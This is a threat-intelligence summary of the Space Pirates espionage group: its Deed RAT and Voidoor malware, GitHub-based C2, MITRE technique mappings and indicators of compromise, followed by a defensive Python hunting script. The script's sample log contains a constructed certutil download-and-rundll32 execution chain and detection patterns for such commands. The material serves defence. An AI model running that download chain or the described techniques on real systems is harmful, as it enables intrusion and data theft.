Space Pirates, a threat group active since 2017, is profiled by PT ESC with its evolving toolkit and novel attack vectors, including Deed RAT and Voidoor, plus a GitHub- and forum-based C2 approach. The report notes expanded targets in Russia and Serbia across government, education, energy, and private sector, while attackers increasingly reuse infrastructure, tools, and public utilities to conduct espionage and data theft. #SpacePirates #ShadowPad #DeedRAT #Voidoor #Acunetix #GitHub #SerbianMinistry
Keypoints
- PT ESC identifies Space Pirates as a long-running group (active since at least 2017) that expanded its target geography to Russia and Serbia, targeting government, education, and sectoral organisations.
- The group uses the Acunetix web vulnerability scanner to probe victim infrastructure for exploitable flaws; the report describes this reconnaissance step as a new attack vector for the group.
- ShadowPad is also used by Space Pirates: a chain of SSL certificates links the infrastructure to the group's activity, and a copy of ShadowPad was found in a victim environment.
- Deed RAT is the primary backdoor, with active development, a 64-bit variant, and modular plugins (Disk and Portmap) providing disk and network functions.
- Voidoor is a secondary malware delivered from an already-infected host, featuring a complex GitHub/voidtools-based command lifecycle and a multi-stage, XOR-encrypted string workflow.
- The group leverages GitHub repositories as a C2/data pipeline (victim lists, shellcode, and commands) and uses the voidtools forum to extend command and control capabilities.
- Public tools (Mimikatz, PsExec, NBTscan, and more) accompany Space Pirates’ operations, highlighting reliance on widely available network utilities and custom Golang-based tools.
MITRE Techniques
- [T1595.002] Active Scanning: Vulnerability Scanning – The Space Pirates group uses Acunetix to search for vulnerabilities in victim infrastructures. “The Space Pirates group uses Acunetix to search for vulnerabilities in victim infrastructures.”
- [T1566.001] Phishing: Spearphishing Attachment – Space Pirates uses phishing emails with malicious attachments. “Space Pirates uses phishing emails with malicious attachments.”
- [T1566.002] Phishing: Spearphishing Link – Space Pirates uses phishing emails with links to malware. “Space Pirates uses phishing emails with links to malware.”
- [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Space Pirates malware features remote command shell functionality. “remote command shell functionality.”
- [T1059.005] Command and Scripting Interpreter: Visual Basic – Space Pirates uses VBS scripts, including ReVBShell. “VBS scripts, including ReVBShell.”
- [T1106] Native API – Space Pirates malware uses WinAPI functions to run new processes and implement shellcode. “WinAPI functions to run new processes and implement shellcode.”
- [T1053.002] Scheduled Task/Job: At (Windows) – Space Pirates uses atexec.py to run commands on a remote host. “atexec.py to run commands on a remote host”
- [T1053.005] Scheduled Task/Job: Scheduled Task – Space Pirates uses system tasks. “Scheduled Task”
- [T1569.002] System Services: Service Execution – Space Pirates creates malicious services. “creates malicious services”
- [T1543.003] Create or Modify System Process: Windows Service – Space Pirates creates malicious services for persistence on the host. “Windows Service”
- [T1546.015] Event Triggered Execution: COM Hijacking – RtlShare malware persists in the system through substitution of the MruPidlList COM object. “MruPidlList COM object.”
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Space Pirates can place a shortcut in the autorun folder and use the Run and RunOnce registry keys. “autorun folder and use the Run and RunOnce registry keys”
- [T1068] Exploitation for Privilege Escalation – Space Pirates can exploit the CVE-2017-0213 vulnerability for privilege escalation. “CVE-2017-0213 vulnerability”
- [T1027.001] Obfuscated Files or Information: Binary Padding – The RtlShare dropper adds random bytes to the extracted payload. “adds random bytes to the extracted payload”
- [T1027.002] Obfuscated Files or Information: Software Packing – One of the stages of the BH_A006 malware is obfuscated using an unknown protector. “obfuscated using an unknown protector”
- [T1036.004] Masquerading: Masquerade Task or Service – Space Pirates uses legitimate-looking names when creating services. “legitimate-looking names when creating services”
- [T1036.005] Masquerading: Match Legitimate Name or Location – Space Pirates masks its malware as legitimate software. “masks its malware as legitimate software”
- [T1055] Process Injection – Space Pirates malware can inject shellcode into other processes. “inject shellcode into other processes”
- [T1055.001] Process Injection: DLL Injection – Space Pirates malware can inject DLLs with payload into other processes. “DLL injections”
- [T1078.002] Valid Accounts: Domain Accounts – Space Pirates uses compromised privileged credentials. “compromised privileged credentials”
- [T1112] Modify Registry – Deed RAT stores all its data in the registry, including configuration and plugins. “stores all its data in the registry”
- [T1140] Deobfuscate/Decode Files or Information – Space Pirates uses various algorithms to encrypt configuration data and payload. “encrypt configuration data and payload”
- [T1197] BITS Jobs – Space Pirates uses BITS jobs to download malware. “BITS jobs”
- [T1218.011] Signed Binary Proxy Execution: Rundll32 – Space Pirates can use rundll32.exe to run DLLs. “Rundll32”
- [T1553.002] Subvert Trust Controls: Code Signing – Space Pirates uses stolen certificates to sign some Zupdax instances. “stolen certificates to sign”
- [T1564.001] Hide Artifacts: Hidden Files and Directories – Space Pirates can store its malware in hidden folders under C:\ProgramData. “hidden folders”
- [T1574.002] Hijack Execution Flow: DLL Side-Loading – Space Pirates uses legitimate applications vulnerable to DLL side-loading. “DLL side-loading”
- [T1620] Reflective Code Loading – Space Pirates malware uses reflective loading to run payloads in memory. “Reflective loading”
- [T1555.003] Credentials from Password Stores: Chrome – Space Pirates uses the Chromepass tool to retrieve passwords from Chrome browser storage. “Chromepass tool”
- [T1003.001] OS Credential Dumping: LSASS Memory – Space Pirates gets LSASS process dumps for credential dumping. “LSASS process dumps”
- [T1040] Network Sniffing – Deed RAT collects information about in-use proxies through network sniffing. “network sniffing”
- [T1087.001] Account Discovery: Local Account – Space Pirates collects information about users through the query user command. “query user”
- [T1087.002] Account Discovery: Domain Account – Space Pirates collects information about users in the domain through the legitimate CSVDE tool. “CSVDE tool”
- [T1082] System Information Discovery – Space Pirates collects system information (OS, CPU, memory, disk). “system information”
- [T1016] System Network Configuration Discovery – Space Pirates collects information about the network settings. “network settings”
- [T1069.002] Permission Groups Discovery: Domain Groups – Space Pirates collects domain group info via CSVDE. “domain groups”
- [T1083] File and Directory Discovery – Space Pirates collects information about .doc and .pdf files. “docs and pdf files”
- [T1033] System Owner/User Discovery – Space Pirates collects user information. “users”
- [T1057] Process Discovery – Space Pirates uses tasklist.exe to retrieve process information. “tasklist.exe”
- [T1021.002] Remote Services: SMB/Windows Admin Shares – Space Pirates uses atexec.py and psexec.rb to move laterally. “atexec.py and psexec.rb”
- [T1119] Automated Collection – Space Pirates searches for and copies *.doc and *.pdf. “searches for and copies files”
- [T1560.001] Archive Collected Data: Archive via Utility – Space Pirates zips stolen documents with 7-Zip. “zip stolen documents into password-protected archives using 7-Zip”
- [T1056.001] Input Capture: Keylogging – Space Pirates malware can capture user input. “keylogging”
- [T1071.001] Application Layer Protocol: Web Protocols – Deed RAT encapsulates its protocol in HTTP/HTTPS. “HTTP and HTTPS”
- [T1095] Non-Application Layer Protocol – Space Pirates uses its own protocols to communicate with the C2 server. “own protocols to communicate”
- [T1102.002] Web Service: Bidirectional Communication – Space Pirates uses a combination of the voidtools forum and GitHub as the C&C server. “combination of the voidtools forum and GitHub as the C&C server”
- [T1105] Ingress Tool Transfer – Space Pirates downloads additional utilities from the C2 server using the certutil tool. “downloads additional utilities … certutil”
- [T1573.001] Encrypted Channel: Symmetric Cryptography – Space Pirates encrypts network messages using symmetric algorithms. “encrypt network messages”
- [T1571] Non-Standard Port – Space Pirates uses non-standard ports (8081, 5351, 63514) for C2. “non-standard ports”
- [T1572] Protocol Tunneling – The dog-tunnel utility is used for traffic tunneling. “traffic tunneling”
- [T1090.001] Proxy: Internal Proxy – Deed RAT can discover and use proxies to connect to its C2. “internal proxy”
Indicators of Compromise
- [IP Address] context – 8.8.8.8, 1.1.1.1, 9.9.9.9, and 222.222.67[.]208 (DNS-related servers referenced in the malware configuration; the first three are public DNS resolvers and are not malicious on their own, so they are a configuration fingerprint rather than a blocklist entry)
- [Domain] context – ruclient.dns04.com.ruclient.dns04.com (DDNS URL); api.github.com; github.com
- [Hash] context – 164adc449d458c4b0819bb348db9b07ca2fc367d (SHA-1); 1A11878899834F1591DFADC277B2132E (MD5)
- [FileName] context – ConsoleApplication1.exe; orderFile.txt; silentBase.bat
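The technique list and the IoC list above are easier to act on when combined into a single hunting pass. The following is an added example, not code from PT ESC or from the report: it parses a few constructed endpoint log lines (key=value format, a hypothetical schema chosen for the example) and flags the behaviours the summary attributes to Space Pirates, namely certutil downloads (T1105), rundll32 execution (T1218.011), `query user` and `tasklist.exe` discovery (T1087.001, T1057), CSVDE domain enumeration (T1087.002), connections to the non-standard C2 ports 8081, 5351 and 63514 (T1571), connections to the GitHub hosts used as a C2 channel (T1102.002), and matches on the file names and hashes from the IoC section. The log lines, host names and IP addresses are constructed; the indicators and technique IDs are the ones on this page.

```python
"""Hunting pass over endpoint logs for Space Pirates behaviours and IoCs.

Added example (not the report's own code). Log schema, hosts and addresses
are constructed; indicators and technique IDs come from the summary above.
"""
import re
from dataclasses import dataclass

# Indicators copied from the IoC section (hashes lower-cased for comparison).
IOC_HASHES = {
    "164adc449d458c4b0819bb348db9b07ca2fc367d",  # SHA-1
    "1a11878899834f1591dfadc277b2132e",          # MD5
}
IOC_FILENAMES = {"consoleapplication1.exe", "orderfile.txt", "silentbase.bat"}
IOC_C2_PORTS = {8081, 5351, 63514}                  # T1571 Non-Standard Port
WEB_SERVICE_C2 = {"api.github.com", "github.com"}    # T1102.002 (voidtools forum host not given on the page)

# Command-line rules mapped to the techniques listed above.
CMDLINE_RULES = [
    ("T1105", re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache", re.I)),   # certutil download
    ("T1218.011", re.compile(r"\brundll32(?:\.exe)?\b", re.I)),          # rundll32 proxy execution
    ("T1087.001", re.compile(r"\bquery\s+user\b", re.I)),                # local account discovery
    ("T1057", re.compile(r"\btasklist(?:\.exe)?\b", re.I)),              # process discovery
    ("T1087.002", re.compile(r"\bcsvde(?:\.exe)?\b", re.I)),             # domain account discovery
]

# key=value pairs, where values may be double-quoted to allow spaces.
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


@dataclass(frozen=True)
class Finding:
    technique: str   # MITRE technique ID or "IOC:<kind>"
    host: str
    detail: str


def parse_line(line):
    """Turn one constructed log line into a dict of its key=value fields."""
    return {k: (q if q else b) for k, q, b in KV_RE.findall(line)}


def evaluate(fields):
    """Apply every rule to one parsed event and return the findings it produces."""
    out = []
    host = fields.get("host", "?")
    kind = fields.get("event")
    if kind == "process":
        cmd = fields.get("cmdline", "")
        for tid, rx in CMDLINE_RULES:
            if rx.search(cmd):
                out.append(Finding(tid, host, cmd))
    elif kind == "network":
        dst = fields.get("dst", "")
        port = int(fields.get("dport", "0"))
        if port in IOC_C2_PORTS:
            out.append(Finding("T1571", host, f"{dst}:{port}"))
        if dst.lower() in WEB_SERVICE_C2:
            out.append(Finding("T1102.002", host, f"{fields.get('image')} -> {dst}"))
    elif kind == "file":
        name = fields.get("name", "").rsplit("\\", 1)[-1].lower()
        if name in IOC_FILENAMES:
            out.append(Finding("IOC:filename", host, name))
        if fields.get("hash", "").lower() in IOC_HASHES:
            out.append(Finding("IOC:hash", host, fields["hash"].lower()))
    return out


def hunt(log_text):
    """Run the rules over every non-empty line of a log and collect findings."""
    findings = []
    for line in log_text.splitlines():
        if line.strip():
            findings.extend(evaluate(parse_line(line)))
    return findings


def summarize(findings):
    """Group technique hits per host so the analyst sees a chain, not isolated hits."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f.host, []).append(f.technique)
    return by_host


# Constructed sample log: ws01 shows a download-to-ProgramData chain, ws02 a beacon
# to GitHub plus discovery, ws03 a benign git client that trips the GitHub rule.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z host=ws01 event=process image=C:\\Windows\\System32\\certutil.exe cmdline="certutil.exe -urlcache -split -f http://198.51.100.7/orderFile.txt C:\\ProgramData\\orderFile.txt"
2024-05-01T10:00:02Z host=ws01 event=file name=C:\\ProgramData\\orderFile.txt hash=1A11878899834F1591DFADC277B2132E
2024-05-01T10:00:03Z host=ws01 event=process image=C:\\Windows\\System32\\rundll32.exe cmdline="rundll32.exe C:\\ProgramData\\update.dll,Start"
2024-05-01T10:00:04Z host=ws01 event=network image=C:\\ProgramData\\ConsoleApplication1.exe dst=203.0.113.44 dport=63514
2024-05-01T10:00:05Z host=ws02 event=network image=C:\\ProgramData\\ConsoleApplication1.exe dst=api.github.com dport=443
2024-05-01T10:00:06Z host=ws02 event=process image=C:\\Windows\\System32\\cmd.exe cmdline="cmd.exe /c query user"
2024-05-01T10:00:07Z host=ws03 event=process image=C:\\Program Files\\Git\\bin\\git.exe cmdline="git fetch origin"
2024-05-01T10:00:08Z host=ws03 event=network image=C:\\Program Files\\Git\\bin\\git.exe dst=github.com dport=443
"""

if __name__ == "__main__":
    for host, techniques in summarize(hunt(SAMPLE_LOG)).items():
        print(host, "->", ", ".join(techniques))
```

Two of these rules are deliberately low-fidelity on their own: rundll32 and traffic to github.com are common on healthy workstations (ws03 in the sample is a plain git client), so the per-host grouping in `summarize` is the part that matters: ws01 chains a certutil download into C:\ProgramData, a known-bad hash, rundll32 execution and a connection on port 63514, which is the pattern worth escalating, while a single GitHub hit on ws03 is not.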